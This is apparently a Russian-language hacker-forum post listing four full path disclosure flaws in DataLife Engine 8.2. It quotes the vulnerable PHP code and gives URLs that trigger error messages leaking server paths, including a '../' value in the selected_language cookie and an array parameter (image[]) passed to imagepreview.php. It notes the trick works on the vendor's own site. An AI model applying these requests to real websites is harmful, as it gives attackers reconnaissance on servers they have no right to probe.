Раскрытие путей
DataLife Engine 8.2
Без всяких куков
1)файл preview.php
PHP код:
require_once ROOT_DIR.'/engine/classes/templates.class.php';
самое прикрльное что ROOT_DIR читает как папку, хотя многие в асе написали что
константа *в не понятках*
вызываем этот файл:
http://dle/engine/inc/preview.php
получаем
Warning: require_once(ROOT_DIR/engine/classes/templates.class.php) [function.require-once]: failed to open stream: No such file or directory in C:\AppServ\www\upload33\engine\inc\preview.php on line 2
на офф сайте даже канает)
+ 2)еще ругается с файла Init.php
PHP код:
require_once (ENGINE_DIR . '/inc/include/functions.inc.php');
extract( $_REQUEST, EXTR_SKIP );
require_once (ENGINE_DIR . '/data/config.php');
http://dle/engine/inc/include/init.php
Warning: require_once(ENGINE_DIR/inc/include/functions.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/public_html/engine/inc/include/init.php on line 18
+3) нужны куки
engine/ajax/antivirus.php
PHP код:
if (isset( $_COOKIE['selected_language'] )) {
$_COOKIE['selected_language'] = totranslit( $_COOKIE['selected_language'], false, false );
if (@is_dir ( ROOT_DIR . '/language/' . $_COOKIE['selected_language'] )) {
$selected_language = $_COOKIE['selected_language'];
}
}
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
все тоже самое что и у mailbrush'a. только в куках имя selected_language и значение ../ уже выдаст ошибку
+4) самое бональное раскрытие
engine/modules/imagepreview.php
PHP код:
$_GET['image'] = htmlspecialchars ($_GET['image'], ENT_QUOTES);
$_GET['image'] = str_replace( "document.cookie", "", $_GET['image'] );
$_GET['image'] = str_replace( "javascript", "", $_GET['image'] );
http://dle/engine/modules/imagepreview.php?image[]=
PS и не нужны куки здесь)
Зыы ну почти не нужны